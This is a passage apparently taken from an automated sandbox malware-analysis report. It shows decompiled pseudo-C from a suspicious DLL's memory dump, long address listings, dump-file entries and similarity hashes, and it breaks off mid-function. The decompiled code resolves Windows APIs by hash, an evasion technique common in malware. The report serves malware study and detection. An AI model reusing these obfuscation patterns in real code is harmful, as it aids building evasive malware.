                                                                                                                                                						} while (_t414 <  *_t428);
                                                                                                                                                						goto L101;
                                                                                                                                                					}
                                                                                                                                                					L10:
                                                                                                                                                					if( *((char*)(_t430 + 0x18)) != 0) {
                                                                                                                                                						E1000BB88(_t430 + 0x14);
                                                                                                                                                					}
                                                                                                                                                					goto L12;
                                                                                                                                                				} else {
                                                                                                                                                					return _t155;
                                                                                                                                                				}
                                                                                                                                                			}



































































                                                                                                                                                0x10010763
                                                                                                                                                0x10010765
                                                                                                                                                0x1001076c
                                                                                                                                                0x10010feb
                                                                                                                                                0x10010ff1
                                                                                                                                                0x10010ff1
                                                                                                                                                0x10010776
                                                                                                                                                0x10010782
                                                                                                                                                0x1001078e
                                                                                                                                                0x10010793
                                                                                                                                                0x100107a0
                                                                                                                                                0x100107b1
                                                                                                                                                0x100107b3
                                                                                                                                                0x100107b4
                                                                                                                                                0x100107b5
                                                                                                                                                0x100107b5
                                                                                                                                                0x100107b6
                                                                                                                                                0x100107ba
                                                                                                                                                0x100107be
                                                                                                                                                0x100107c3
                                                                                                                                                0x100107c6
                                                                                                                                                0x100107cc
                                                                                                                                                0x100107e6
                                                                                                                                                0x100107ed
                                                                                                                                                0x100107f0
                                                                                                                                                0x100107f3
                                                                                                                                                0x100107f5
                                                                                                                                                0x10010801
                                                                                                                                                0x1001080e
                                                                                                                                                0x1001081b
                                                                                                                                                0x1001081f
                                                                                                                                                0x100108ab
                                                                                                                                                0x100108ab
                                                                                                                                                0x100108ad
                                                                                                                                                0x100108b1
                                                                                                                                                0x100108bc
                                                                                                                                                0x100108d2
                                                                                                                                                0x100108d5
                                                                                                                                                0x100108d5
                                                                                                                                                0x100108d9
                                                                                                                                                0x100108e2
                                                                                                                                                0x100108e7
                                                                                                                                                0x100108e7
                                                                                                                                                0x100108e9
                                                                                                                                                0x100108fa
                                                                                                                                                0x1001091c
                                                                                                                                                0x1001091e
                                                                                                                                                0x1001091f
                                                                                                                                                0x10010923
                                                                                                                                                0x10010923
                                                                                                                                                0x1001092c
                                                                                                                                                0x10010938
                                                                                                                                                0x10010941
                                                                                                                                                0x10010957
                                                                                                                                                0x10010967
                                                                                                                                                0x1001096c
                                                                                                                                                0x10010970
                                                                                                                                                0x10010975
                                                                                                                                                0x10010977
                                                                                                                                                0x100109c7
                                                                                                                                                0x100109dc
                                                                                                                                                0x100109e0
                                                                                                                                                0x100109e5
                                                                                                                                                0x100109f6
                                                                                                                                                0x10010a0b
                                                                                                                                                0x10010a0f
                                                                                                                                                0x10010a14
                                                                                                                                                0x10010a16
                                                                                                                                                0x10010a5d
                                                                                                                                                0x10010a60
                                                                                                                                                0x10010aae
                                                                                                                                                0x10010ab1
                                                                                                                                                0x10010af2
                                                                                                                                                0x10010af6
                                                                                                                                                0x10010afb
                                                                                                                                                0x10010b00
                                                                                                                                                0x10010b1f
                                                                                                                                                0x10010b1f
                                                                                                                                                0x10010b1f
                                                                                                                                                0x10010b21
                                                                                                                                                0x00000000
                                                                                                                                                0x10010b21
                                                                                                                                                0x10010b02
                                                                                                                                                0x10010b06
                                                                                                                                                0x10010b08
                                                                                                                                                0x10010b0f
                                                                                                                                                0x10010b0f
                                                                                                                                                0x10010b15
                                                                                                                                                0x10010b15
                                                                                                                                                0x10010b17
                                                                                                                                                0x10010b1a
                                                                                                                                                0x10010b1a
                                                                                                                                                0x00000000
                                                                                                                                                0x10010b17
                                                                                                                                                0x10010b0a
                                                                                                                                                0x10010b0d
                                                                                                                                                0x10010b13
                                                                                                                                                0x10010b13
                                                                                                                                                0x00000000
                                                                                                                                                0x10010b13
                                                                                                                                                0x00000000
                                                                                                                                                0x10010b0d
                                                                                                                                                0x10010ab3
                                                                                                                                                0x10010ab6
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10010abc
                                                                                                                                                0x10010ac1
                                                                                                                                                0x10010ac6
                                                                                                                                                0x10010ae5
                                                                                                                                                0x10010ae5
                                                                                                                                                0x10010aef
                                                                                                                                                0x00000000
                                                                                                                                                0x10010aef
                                                                                                                                                0x10010ac8
                                                                                                                                                0x10010acc
                                                                                                                                                0x10010ace
                                                                                                                                                0x10010ad5
                                                                                                                                                0x10010ad5
                                                                                                                                                0x10010adb
                                                                                                                                                0x10010adb
                                                                                                                                                0x10010add
                                                                                                                                                0x10010ae0
                                                                                                                                                0x10010ae0
                                                                                                                                                0x00000000
                                                                                                                                                0x10010add
                                                                                                                                                0x10010ad0
                                                                                                                                                0x10010ad3
                                                                                                                                                0x10010ad9
                                                                                                                                                0x10010ad9
                                                                                                                                                0x00000000
                                                                                                                                                0x10010ad9
                                                                                                                                                0x00000000
                                                                                                                                                0x10010ad3
                                                                                                                                                0x10010a62
                                                                                                                                                0x10010a64
                                                                                                                                                0x10010aa3
                                                                                                                                                0x10010aa6
                                                                                                                                                0x10010e18
                                                                                                                                                0x10010e1d
                                                                                                                                                0x10010e22
                                                                                                                                                0x10010e41
                                                                                                                                                0x10010e41
                                                                                                                                                0x10010e4b
                                                                                                                                                0x00000000
                                                                                                                                                0x10010e4b
                                                                                                                                                0x10010e24
                                                                                                                                                0x10010e28
                                                                                                                                                0x10010e2a
                                                                                                                                                0x10010e31
                                                                                                                                                0x10010e31
                                                                                                                                                0x10010e37
                                                                                                                                                0x10010e37
                                                                                                                                                0x10010e39
                                                                                                                                                0x10010e3c
                                                                                                                                                0x10010e3c
                                                                                                                                                0x00000000
                                                                                                                                                0x10010e39
                                                                                                                                                0x10010e2c
                                                                                                                                                0x10010e2f
                                                                                                                                                0x10010e35
                                                                                                                                                0x10010e35
                                                                                                                                                0x00000000
                                                                                                                                                0x10010e35
                                                                                                                                                0x00000000
                                                                                                                                                0x10010e2f
                                                                                                                                                0x00000000
                                                                                                                                                0x10010aac
                                                                                                                                                0x10010a6a
                                                                                                                                                0x10010a6f
                                                                                                                                                0x10010a74
                                                                                                                                                0x10010a93
                                                                                                                                                0x10010a93
                                                                                                                                                0x10010a9d
                                                                                                                                                0x00000000
                                                                                                                                                0x10010a9d
                                                                                                                                                0x10010a76
                                                                                                                                                0x10010a7a
                                                                                                                                                0x10010a7c
                                                                                                                                                0x10010a83
                                                                                                                                                0x10010a83
                                                                                                                                                0x10010a89
                                                                                                                                                0x10010a89
                                                                                                                                                0x10010a8b
                                                                                                                                                0x10010a8e
                                                                                                                                                0x10010a8e
                                                                                                                                                0x00000000
                                                                                                                                                0x10010a8b
                                                                                                                                                0x10010a7e
                                                                                                                                                0x10010a81
                                                                                                                                                0x10010a87
                                                                                                                                                0x10010a87
                                                                                                                                                0x00000000
                                                                                                                                                0x10010a87
                                                                                                                                                0x00000000
                                                                                                                                                0x10010a81
                                                                                                                                                0x10010a18
                                                                                                                                                0x10010a1a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10010a24
                                                                                                                                                0x10010a29
                                                                                                                                                0x10010a2e
                                                                                                                                                0x10010a4d
                                                                                                                                                0x10010a4d
                                                                                                                                                0x10010a57
                                                                                                                                                0x00000000
                                                                                                                                                0x10010a57
                                                                                                                                                0x10010a30
                                                                                                                                                0x10010a34
                                                                                                                                                0x10010a36
                                                                                                                                                0x10010a3d
                                                                                                                                                0x10010a3d
                                                                                                                                                0x10010a43
                                                                                                                                                0x10010a43
                                                                                                                                                0x10010a45
                                                                                                                                                0x10010a48
                                                                                                                                                0x10010a48
                                                                                                                                                0x00000000
                                                                                                                                                0x10010a45
                                                                                                                                                0x10010a38
                                                                                                                                                0x10010a3b
                                                                                                                                                0x10010a41
                                                                                                                                                0x10010a41
                                                                                                                                                0x00000000
                                                                                                                                                0x10010a41
                                                                                                                                                0x00000000
                                                                                                                                                0x10010a3b
                                                                                                                                                0x1001097d
                                                                                                                                                0x10010982
                                                                                                                                                0x10010987
                                                                                                                                                0x100109a6
                                                                                                                                                0x100109a6
                                                                                                                                                0x100109b0
                                                                                                                                                0x00000000
                                                                                                                                                0x100109b0
                                                                                                                                                0x10010989
                                                                                                                                                0x1001098d
                                                                                                                                                0x1001098f
                                                                                                                                                0x10010996
                                                                                                                                                0x10010996
                                                                                                                                                0x1001099c
                                                                                                                                                0x1001099c
                                                                                                                                                0x1001099e
                                                                                                                                                0x100109a1
                                                                                                                                                0x100109a1
                                                                                                                                                0x00000000
                                                                                                                                                0x1001099e
                                                                                                                                                0x10010991
                                                                                                                                                0x10010994
                                                                                                                                                0x1001099a
                                                                                                                                                0x1001099a
                                                                                                                                                0x00000000
                                                                                                                                                0x1001099a
                                                                                                                                                0x00000000
                                                                                                                                                0x100108be
                                                                                                                                                0x100108c0
                                                                                                                                                0x10010b25
                                                                                                                                                0x10010b2a
                                                                                                                                                0x10010b2d
                                                                                                                                                0x10010b32
                                                                                                                                                0x10010b34
                                                                                                                                                0x10010b49
                                                                                                                                                0x10010b4c
                                                                                                                                                0x10010c1a
                                                                                                                                                0x10010c22
                                                                                                                                                0x10010c25
                                                                                                                                                0x10010c36
                                                                                                                                                0x10010c3a
                                                                                                                                                0x10010c44
                                                                                                                                                0x10010c44
                                                                                                                                                0x10010c46
                                                                                                                                                0x10010c48
                                                                                                                                                0x10010c57
                                                                                                                                                0x10010c63
                                                                                                                                                0x10010c67
                                                                                                                                                0x10010c6a
                                                                                                                                                0x10010c6d
                                                                                                                                                0x10010c70
                                                                                                                                                0x00000000
                                                                                                                                                0x10010c70
                                                                                                                                                0x10010b5c
                                                                                                                                                0x10010b6e
                                                                                                                                                0x10010b72
                                                                                                                                                0x10010bfe
                                                                                                                                                0x10010bfe
                                                                                                                                                0x10010c04
                                                                                                                                                0x10010c0f
                                                                                                                                                0x10010c06
                                                                                                                                                0x10010c06
                                                                                                                                                0x10010c06
                                                                                                                                                0x00000000
                                                                                                                                                0x10010c04
                                                                                                                                                0x10010b7f
                                                                                                                                                0x10010b80
                                                                                                                                                0x10010b82
                                                                                                                                                0x10010b88
                                                                                                                                                0x10010fd7
                                                                                                                                                0x10010fdc
                                                                                                                                                0x10010fde
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10010fe4
                                                                                                                                                0x10010b9f
                                                                                                                                                0x10010ba3
                                                                                                                                                0x10010ba8
                                                                                                                                                0x10010bba
                                                                                                                                                0x10010bbe
                                                                                                                                                0x10010bc9
                                                                                                                                                0x10010bca
                                                                                                                                                0x10010bcb
                                                                                                                                                0x10010bcc
                                                                                                                                                0x10010bce
                                                                                                                                                0x10010bd9
                                                                                                                                                0x10010e51
                                                                                                                                                0x10010e51
                                                                                                                                                0x10010bd9
                                                                                                                                                0x10010bdf
                                                                                                                                                0x10010be8
                                                                                                                                                0x10010e63
                                                                                                                                                0x10010e79
                                                                                                                                                0x10010e7b
                                                                                                                                                0x10010e7d
                                                                                                                                                0x10010fb8
                                                                                                                                                0x10010fbf
                                                                                                                                                0x00000000
                                                                                                                                                0x10010fbf
                                                                                                                                                0x10010e8c
                                                                                                                                                0x10010e9a
                                                                                                                                                0x10010eb4
                                                                                                                                                0x10010eb6
                                                                                                                                                0x10010eb8
                                                                                                                                                0x10010fc9
                                                                                                                                                0x10010fce
                                                                                                                                                0x10010fd0
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10010fd2
                                                                                                                                                0x10010ecc
                                                                                                                                                0x10010ed7
                                                                                                                                                0x10010ee6
                                                                                                                                                0x10010ef8
                                                                                                                                                0x10010efa
                                                                                                                                                0x10010efc
                                                                                                                                                0x10010f09
                                                                                                                                                0x10010f09
                                                                                                                                                0x10010f19
                                                                                                                                                0x10010f2a
                                                                                                                                                0x10010f2f
                                                                                                                                                0x10010f31
                                                                                                                                                0x10010f33
                                                                                                                                                0x10010f3a
                                                                                                                                                0x10010f3b
                                                                                                                                                0x10010f3b
                                                                                                                                                0x10010f47
                                                                                                                                                0x10010f68
                                                                                                                                                0x10010f71
                                                                                                                                                0x10010f7d
                                                                                                                                                0x10010f89
                                                                                                                                                0x10010f8e
                                                                                                                                                0x10010f93
                                                                                                                                                0x10010f99
                                                                                                                                                0x10010f99
                                                                                                                                                0x10010f9e
                                                                                                                                                0x10010fa4
                                                                                                                                                0x00000000
                                                                                                                                                0x10010faa
                                                                                                                                                0x10010fac
                                                                                                                                                0x00000000
                                                                                                                                                0x10010fac
                                                                                                                                                0x10010bee
                                                                                                                                                0x10010bee
                                                                                                                                                0x10010bf3
                                                                                                                                                0x10010bf9
                                                                                                                                                0x10010bf9
                                                                                                                                                0x00000000
                                                                                                                                                0x10010bf3
                                                                                                                                                0x10010be8
                                                                                                                                                0x100108bc
                                                                                                                                                0x1001082c
                                                                                                                                                0x1001082d
                                                                                                                                                0x1001082f
                                                                                                                                                0x10010835
                                                                                                                                                0x10010e02
                                                                                                                                                0x10010e07
                                                                                                                                                0x10010e09
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10010e0f
                                                                                                                                                0x1001084c
                                                                                                                                                0x10010850
                                                                                                                                                0x10010855
                                                                                                                                                0x10010867
                                                                                                                                                0x1001086b
                                                                                                                                                0x10010876
                                                                                                                                                0x10010877
                                                                                                                                                0x10010878
                                                                                                                                                0x10010879
                                                                                                                                                0x1001087b
                                                                                                                                                0x10010886
                                                                                                                                                0x10010c7e
                                                                                                                                                0x10010c7e
                                                                                                                                                0x10010886
                                                                                                                                                0x1001088c
                                                                                                                                                0x10010895
                                                                                                                                                0x10010c8d
                                                                                                                                                0x10010ca3
                                                                                                                                                0x10010ca5
                                                                                                                                                0x10010ca7
                                                                                                                                                0x10010dd8
                                                                                                                                                0x10010ddc
                                                                                                                                                0x00000000
                                                                                                                                                0x10010ddc
                                                                                                                                                0x10010cb3
                                                                                                                                                0x10010cbe
                                                                                                                                                0x10010cd8
                                                                                                                                                0x10010cda
                                                                                                                                                0x10010cdc
                                                                                                                                                0x10010df4
                                                                                                                                                0x10010df9
                                                                                                                                                0x10010dfb
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10010dfd
                                                                                                                                                0x10010ced
                                                                                                                                                0x10010cfb
                                                                                                                                                0x10010d02
                                                                                                                                                0x10010d03
                                                                                                                                                0x10010d04
                                                                                                                                                0x10010d16
                                                                                                                                                0x10010d18
                                                                                                                                                0x10010d1a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10010d22
                                                                                                                                                0x10010d3d
                                                                                                                                                0x10010d3f
                                                                                                                                                0x10010d41
                                                                                                                                                0x10010de6
                                                                                                                                                0x10010deb
                                                                                                                                                0x10010ded
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10010def
                                                                                                                                                0x10010d47
                                                                                                                                                0x10010d4e
                                                                                                                                                0x10010d52
                                                                                                                                                0x10010dbd
                                                                                                                                                0x10010dbd
                                                                                                                                                0x10010dbf
                                                                                                                                                0x10010dc6
                                                                                                                                                0x10010dc6
                                                                                                                                                0x10010dcc
                                                                                                                                                0x10010dcc
                                                                                                                                                0x10010dce
                                                                                                                                                0x10010dd3
                                                                                                                                                0x10010dd3
                                                                                                                                                0x00000000
                                                                                                                                                0x10010dce
                                                                                                                                                0x10010dc1
                                                                                                                                                0x10010dc4
                                                                                                                                                0x10010dca
                                                                                                                                                0x10010dca
                                                                                                                                                0x00000000
                                                                                                                                                0x10010dca
                                                                                                                                                0x00000000
                                                                                                                                                0x10010dc4
                                                                                                                                                0x10010d54
                                                                                                                                                0x10010d54
                                                                                                                                                0x10010d56
                                                                                                                                                0x10010d62
                                                                                                                                                0x10010d67
                                                                                                                                                0x10010d69
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10010d6b
                                                                                                                                                0x10010d6f
                                                                                                                                                0x10010d76
                                                                                                                                                0x10010d77
                                                                                                                                                0x10010d78
                                                                                                                                                0x10010d7a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10010d7c
                                                                                                                                                0x10010d7e
                                                                                                                                                0x10010d85
                                                                                                                                                0x10010d85
                                                                                                                                                0x10010d8b
                                                                                                                                                0x10010d8b
                                                                                                                                                0x10010d8d
                                                                                                                                                0x10010d92
                                                                                                                                                0x10010d92
                                                                                                                                                0x10010d9b
                                                                                                                                                0x10010da0
                                                                                                                                                0x10010da5
                                                                                                                                                0x10010dab
                                                                                                                                                0x10010dab
                                                                                                                                                0x10010db0
                                                                                                                                                0x00000000
                                                                                                                                                0x10010db0
                                                                                                                                                0x10010d80
                                                                                                                                                0x10010d83
                                                                                                                                                0x10010d89
                                                                                                                                                0x10010d89
                                                                                                                                                0x00000000
                                                                                                                                                0x10010d89
                                                                                                                                                0x00000000
                                                                                                                                                0x10010db7
                                                                                                                                                0x10010db7
                                                                                                                                                0x10010db8
                                                                                                                                                0x10010db8
                                                                                                                                                0x00000000
                                                                                                                                                0x10010d56
                                                                                                                                                0x1001089b
                                                                                                                                                0x100108a0
                                                                                                                                                0x100108a6
                                                                                                                                                0x100108a6
                                                                                                                                                0x00000000
                                                                                                                                                0x10010c7d
                                                                                                                                                0x10010c7d
                                                                                                                                                0x10010c7d

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.319669645.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.319665498.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319682425.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319687174.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319691145.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: J}*
                                                                                                                                                • API String ID: 0-3566034359
                                                                                                                                                • Opcode ID: 3de6d7cef0cdc59b9ad438c61b36141e383f1e79743cdaae7623d9e163d39288
                                                                                                                                                • Instruction ID: 2d0b7547684741a8baa3a0fbe14fb8abeb41ea5cf6ce277a40cb2789471ff98d
                                                                                                                                                • Opcode Fuzzy Hash: 3de6d7cef0cdc59b9ad438c61b36141e383f1e79743cdaae7623d9e163d39288
                                                                                                                                                • Instruction Fuzzy Hash: 6B22D134708341AAE760DB20C851BAF77E9EF85384F51892DF8C99F196DBB0E885C752
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                			E1000A52C(signed int* __ecx, void* __eflags) {
                                                                                                                                                				void* __esi;
                                                                                                                                                				void* __ebp;
                                                                                                                                                				void* _t182;
                                                                                                                                                				signed int _t183;
                                                                                                                                                				signed int* _t188;
                                                                                                                                                				void* _t198;
                                                                                                                                                				void* _t199;
                                                                                                                                                				void* _t228;
                                                                                                                                                				void* _t229;
                                                                                                                                                				void* _t242;
                                                                                                                                                				void* _t243;
                                                                                                                                                				void* _t251;
                                                                                                                                                				signed int* _t271;
                                                                                                                                                				void* _t282;
                                                                                                                                                				void* _t284;
                                                                                                                                                				void* _t285;
                                                                                                                                                				void* _t296;
                                                                                                                                                				signed int* _t308;
                                                                                                                                                				void* _t324;
                                                                                                                                                				signed int _t398;
                                                                                                                                                				signed int _t402;
                                                                                                                                                				intOrPtr* _t403;
                                                                                                                                                				intOrPtr* _t404;
                                                                                                                                                				signed int _t406;
                                                                                                                                                				signed int _t407;
                                                                                                                                                				signed int _t409;
                                                                                                                                                				signed int _t411;
                                                                                                                                                				signed int _t412;
                                                                                                                                                				void* _t413;
                                                                                                                                                				signed int _t414;
                                                                                                                                                				signed int _t415;
                                                                                                                                                				signed int _t416;
                                                                                                                                                				signed int _t419;
                                                                                                                                                				void* _t420;
                                                                                                                                                				signed int _t421;
                                                                                                                                                				void* _t422;
                                                                                                                                                				signed int _t424;
                                                                                                                                                				signed int _t429;
                                                                                                                                                				signed int _t433;
                                                                                                                                                				signed int _t434;
                                                                                                                                                				signed int _t437;
                                                                                                                                                				intOrPtr* _t439;
                                                                                                                                                
                                                                                                                                                				_t308 = __ecx;
                                                                                                                                                				 *(_t439 + 0x78) = 0;
                                                                                                                                                				 *_t439 = __ecx + 8;
                                                                                                                                                				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
                                                                                                                                                				while(1) {
                                                                                                                                                					_t392 =  *_t308;
                                                                                                                                                					E1000B69C(_t439 + 0x24, _t392, 0x7fffffff);
                                                                                                                                                					if(E1000F4F4(_t439 + 0x24) == 0) {
                                                                                                                                                						goto L3;
                                                                                                                                                					} else {
                                                                                                                                                						_t308[0xc] = 0;
                                                                                                                                                						E1000F678(_t439 + 0x24);
                                                                                                                                                					}
                                                                                                                                                					L63:
                                                                                                                                                					_t398 = 0xffffffffffffffff;
                                                                                                                                                					_t407 = 0xffffffffffffffff;
                                                                                                                                                					L65:
                                                                                                                                                					if((_t407 | _t398) != 0) {
                                                                                                                                                						L68:
                                                                                                                                                						return _t407;
                                                                                                                                                					}
                                                                                                                                                					if( *(_t439 + 0x78) != 0x20) {
                                                                                                                                                						E1001223C(0x5dc, _t392, _t407);
                                                                                                                                                						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
                                                                                                                                                						continue;
                                                                                                                                                					}
                                                                                                                                                					_t398 = 0xffffffffffffffff;
                                                                                                                                                					_t407 = 0xffffffffffffffff;
                                                                                                                                                					goto L68;
                                                                                                                                                					L3:
                                                                                                                                                					__eflags = _t308[1];
                                                                                                                                                					if(_t308[1] <= 0) {
                                                                                                                                                						L21:
                                                                                                                                                						__eflags =  *(_t439 + 0x20);
                                                                                                                                                						if( *(_t439 + 0x20) <= 0) {
                                                                                                                                                							L33:
                                                                                                                                                							E1000F678(_t439 + 0x24);
                                                                                                                                                							__eflags = _t308[0xc];
                                                                                                                                                							if(_t308[0xc] == 0) {
                                                                                                                                                								L46:
                                                                                                                                                								 *((intOrPtr*)(_t439 + 8)) = 0;
                                                                                                                                                								 *((intOrPtr*)(_t439 + 0xc)) = 0;
                                                                                                                                                								E1000F5A8(_t439 + 0x14, 0);
                                                                                                                                                								 *((intOrPtr*)(_t439 + 0x38)) = 0;
                                                                                                                                                								 *(_t439 + 0x34) =  *_t308;
                                                                                                                                                								E1000F5A8(_t439 + 0x40, 0);
                                                                                                                                                								_t182 = 0x40;
                                                                                                                                                								__eflags = _t308[7] - 0x40;
                                                                                                                                                								_t183 =  <  ? _t308[7] : _t182;
                                                                                                                                                								 *(_t439 + 0x74) = _t183;
                                                                                                                                                								__eflags = _t183;
                                                                                                                                                								if(_t183 <= 0) {
                                                                                                                                                									L57:
                                                                                                                                                									asm("movq xmm0, [0x1001b808]");
                                                                                                                                                									asm("movq [esp+0x84], xmm0");
                                                                                                                                                									_t406 = E1001303C(0xfe338407, 0x8a79536f);
                                                                                                                                                									__eflags = _t406;
                                                                                                                                                									if(_t406 == 0) {
                                                                                                                                                										_t424 = 0;
                                                                                                                                                										__eflags = 0;
                                                                                                                                                										L61:
                                                                                                                                                										__eflags = _t424 - 0x3f;
                                                                                                                                                										if(_t424 <= 0x3f) {
                                                                                                                                                											__eflags = _t424 << 2;
                                                                                                                                                											_t308[0xc] =  *(E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
                                                                                                                                                											_t188 = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
                                                                                                                                                											_t407 = _t308[0xc];
                                                                                                                                                											asm("cdq");
                                                                                                                                                											_t308[0xd] =  *_t188;
                                                                                                                                                											_t398 = _t392;
                                                                                                                                                											E1000B608(_t439 + 0x34);
                                                                                                                                                											E1000B608(_t439 + 8);
                                                                                                                                                											goto L65;
                                                                                                                                                										}
                                                                                                                                                										L62:
                                                                                                                                                										E1000B608(_t439 + 0x34);
                                                                                                                                                										E1000B608(_t439 + 8);
                                                                                                                                                										goto L63;
                                                                                                                                                									}
                                                                                                                                                									_t392 = E1000F4E0(_t439 + 0x14, 0);
                                                                                                                                                									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
                                                                                                                                                									_t133 = _t198 - 0x80; // -128
                                                                                                                                                									_t199 = _t133;
                                                                                                                                                									__eflags = _t199 - 0x3f;
                                                                                                                                                									_t424 =  <=  ? _t199 : _t198;
                                                                                                                                                									__eflags = _t424 - 0x102;
                                                                                                                                                									if(_t424 == 0x102) {
                                                                                                                                                										goto L62;
                                                                                                                                                									}
                                                                                                                                                									goto L61;
                                                                                                                                                								}
                                                                                                                                                								_t437 = 0;
                                                                                                                                                								__eflags = 0;
                                                                                                                                                								while(1) {
                                                                                                                                                									E1000CAD0(_t439 + 0x4c);
                                                                                                                                                									_t392 = 0;
                                                                                                                                                									_t324 = _t439 + 0x4c;
                                                                                                                                                									 *((char*)(_t324 + 4)) = 0;
                                                                                                                                                									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
                                                                                                                                                									__eflags = E1000C2C4(_t324);
                                                                                                                                                									if(__eflags != 0) {
                                                                                                                                                										break;
                                                                                                                                                									}
                                                                                                                                                									E1000F84C(_t439 + 0x14, E1000F4F0(_t439 + 0x10) + 4);
                                                                                                                                                									 *((intOrPtr*)(E1000F4E0(_t439 + 0x14, E1000F4F0(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
                                                                                                                                                									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
                                                                                                                                                									_t409 = E1001303C(0xfe338407, 0xa8c8a645);
                                                                                                                                                									__eflags = _t409;
                                                                                                                                                									if(_t409 == 0) {
                                                                                                                                                										L51:
                                                                                                                                                										_t392 =  *(_t439 + 0x68);
                                                                                                                                                										__eflags = _t392;
                                                                                                                                                										if(__eflags == 0) {
                                                                                                                                                											break;
                                                                                                                                                										}
                                                                                                                                                										__eflags = _t392 - 0xffffffff;
                                                                                                                                                										if(__eflags != 0) {
                                                                                                                                                											E1000F84C(_t439 + 0x40, E1000F4F0(_t439 + 0x3c) + 4);
                                                                                                                                                											 *(E1000F4E0(_t439 + 0x40, E1000F4F0(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
                                                                                                                                                											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
                                                                                                                                                											E1000CD68(_t439 + 0x4c, __eflags);
                                                                                                                                                											_t437 = _t437 + 1;
                                                                                                                                                											__eflags = _t437 -  *(_t439 + 0x74);
                                                                                                                                                											if(_t437 <  *(_t439 + 0x74)) {
                                                                                                                                                												continue;
                                                                                                                                                											}
                                                                                                                                                											_t411 = 0;
                                                                                                                                                											__eflags = 0;
                                                                                                                                                											do {
                                                                                                                                                												E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
                                                                                                                                                												E1000F4E0(_t439 + 0x40, _t411 * 4);
                                                                                                                                                												_t439 = _t439 + 0xffffffd8;
                                                                                                                                                												asm("cdq");
                                                                                                                                                												asm("pxor xmm5, xmm5");
                                                                                                                                                												asm("movd xmm1, dword [ebp]");
                                                                                                                                                												asm("movd xmm4, dword [edi]");
                                                                                                                                                												asm("movd xmm0, edx");
                                                                                                                                                												asm("cdq");
                                                                                                                                                												asm("punpckldq xmm1, xmm0");
                                                                                                                                                												asm("movq xmm2, [ebx+0x38]");
                                                                                                                                                												asm("movq [esp], xmm1");
                                                                                                                                                												asm("movd xmm3, edx");
                                                                                                                                                												asm("punpckldq xmm4, xmm3");
                                                                                                                                                												asm("movq [esp+0x8], xmm2");
                                                                                                                                                												asm("movq [esp+0x10], xmm4");
                                                                                                                                                												asm("movq [esp+0x18], xmm5");
                                                                                                                                                												asm("movq [esp+0x20], xmm5");
                                                                                                                                                												E1000AC8C(__eflags);
                                                                                                                                                												_t411 = _t411 + 1;
                                                                                                                                                												__eflags = _t411 -  *(_t439 + 0x74);
                                                                                                                                                											} while (_t411 <  *(_t439 + 0x74));
                                                                                                                                                											goto L57;
                                                                                                                                                										}
                                                                                                                                                										break;
                                                                                                                                                									}
                                                                                                                                                									_t392 = _t439 + 0x68;
                                                                                                                                                									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
                                                                                                                                                									__eflags = 0;
                                                                                                                                                									if(0 != 0) {
                                                                                                                                                										break;
                                                                                                                                                									}
                                                                                                                                                									goto L51;
                                                                                                                                                								}
                                                                                                                                                								E1000CD68(_t439 + 0x4c, __eflags);
                                                                                                                                                								goto L62;
                                                                                                                                                							}
                                                                                                                                                							_t402 = _t308[1];
                                                                                                                                                							__eflags = _t402;
                                                                                                                                                							if(_t402 <= 0) {
                                                                                                                                                								goto L46;
                                                                                                                                                							}
                                                                                                                                                							_t412 = 0;
                                                                                                                                                							__eflags = 0;
                                                                                                                                                							while(1) {
                                                                                                                                                								_t429 = _t412 * 4;
                                                                                                                                                								_t392 =  *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t429));
                                                                                                                                                								__eflags = _t392 - _t308[0xd];
                                                                                                                                                								if(_t392 == _t308[0xd]) {
                                                                                                                                                									break;
                                                                                                                                                								}
                                                                                                                                                								_t412 = _t412 + 1;
                                                                                                                                                								__eflags = _t412 - _t402;
                                                                                                                                                								if(_t412 < _t402) {
                                                                                                                                                									continue;
                                                                                                                                                								}
                                                                                                                                                								goto L46;
                                                                                                                                                							}
                                                                                                                                                							__eflags = _t412 - 0xffffffff;
                                                                                                                                                							if(_t412 != 0xffffffff) {
                                                                                                                                                								_t228 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
                                                                                                                                                								__eflags = _t228 - _t429;
